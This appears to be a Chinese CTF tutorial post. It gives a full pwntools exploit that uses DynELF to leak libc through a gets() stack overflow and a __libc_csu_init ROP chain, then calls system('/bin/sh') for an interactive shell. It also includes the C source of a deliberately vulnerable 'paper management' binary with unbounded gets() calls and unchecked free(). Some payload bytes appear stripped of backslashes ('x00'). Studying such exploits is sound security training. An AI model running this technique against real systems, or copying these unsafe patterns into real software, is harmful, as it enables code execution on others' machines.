这几天有同学问我在64位下怎么用这个函数,于是针对同一道题写了个利用dynELF的方法
编译好的程序 http://pan.baidu.com/s/1jImF95O
源码在后面
from pwn import * elf = ELF('./pwn_final') got_write = elf.got['write'] print 'got_write= ' + hex(got_write) call_get_name_func = 0x400966 print 'call_get_name_func= ' + hex(call_get_name_func) got_read = elf.got['read'] print "got_read: " + hex(got_read) bss_addr = 0x6020c0 pad = 'a' p = process('./pwn_final') gdb.attach(p) #get system address def leak(address): p.recvuntil('please enter your name:') payload1 = pad * 56 payload1 += p64(0x400d9a)+ p64(0) + p64(1) + p64(got_write) + p64(128) + p64(address) + p64(1) + p64(0x400d80) payload1 += "x00"*56 payload1 += p64(call_get_name_func) p.sendline(payload1) data = p.recv(128) print "%#x => %s" % (address, (data or '').encode('hex')) return data d = DynELF(leak, elf=ELF('./pwn_final')) system_addr = d.lookup('system', 'libc') print "system_addr=" + hex(system_addr) #write system && /bin/sh payload2 = "a"*56 payload2 += p64(0x400d96)+ p64(0) +p64(0) + p64(1) + p64(got_read) + p64(16) + p64(bss_addr) + p64(0) + p64(0x400d80) payload2 += "x00"*56 payload2 += p64(call_get_name_func) p.sendline(payload2) p.send(p64(system_addr)) p.send("/bin/sh ") p.recvuntil('name:') # call system payload3 = "a"*56 payload3 += p64(0x400d96)+ p64(0) +p64(0) + p64(1) + p64(bss_addr) + p64(0) + p64(0) + p64(bss_addr+8) + p64(0x400d80) payload3 += "x00"*56 payload3 += p64(call_get_name_func) p.sendline(payload3) p.interactive()
源码
#include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h> void print_menu(); void get_name(); void add_paper(); void delete_paper(); void show_paper(); int get_num(); void get_input(char *buffer, int size, int no_should_fill_full); void gg(); char *link_list[10]; int main() { setbuf(stdout, 0); setbuf(stdin, 0); setbuf(stderr, 0); int choice; get_name(); while (1){ print_menu(); choice = get_num(); switch (choice){ case 1: add_paper(); break; case 2: delete_paper(); break; case 3: show_paper(); break; default: return; } } printf("thank you!"); } int get_num() { int result; char input[48]; char *end_ptr; get_input(input, 48, 1); result = strtol(input, &end_ptr, 0); if (input == end_ptr){ printf("%s input is not start with number! ", input); result = get_num(); } return result; } void get_input(char *buffer, int size, int no_should_fill_full) { int index = 0; char *current_location; int current_input_size; while (1){ current_location = buffer+index; current_input_size = fread(buffer+index, 1, 1, stdin); if (current_input_size <= 0) break; if (*current_location == ' ' && no_should_fill_full){ if (index){ *current_location = 0; return; } }else{ index++; if (index >= size) break; } } } void get_name() { char name[40]; printf("please enter your name:"); gets(name); } void print_menu() { puts("Welcome to use the improved paper management system!"); puts("1 add paper"); puts("2 delete paper"); puts("3 show paper"); } void show_paper() { int index; int length; printf("Input the index of the paper you want to show(0-9):"); scanf("%d", &index); if (index < 0 || index > 9) exit(1); printf("How long you will enter:"); scanf("%d", &length); if (length < 0 || length > 2048) exit(1); write(stdout, link_list[index], length); } void add_paper() { int index; int length; printf("Input the index you want to store(0-9):"); scanf("%d", &index); if (index < 0 || index > 9) exit(1); printf("How long you will enter:"); scanf("%d", &length); if (length < 0 || length > 2048) exit(1); link_list[index] = malloc(length); if (link_list[index] == NULL) exit(1); printf("please enter your content:"); gets(link_list[index]); printf("add success! "); } void delete_paper() { int index; printf("which paper you want to delete,please enter it's index(0-9):"); scanf("%d", &index); if (index < 0 || index > 9) exit(1); free(link_list[index]); puts("delete success !"); } void gg() { char name[40]; read(stdin, name, 40); }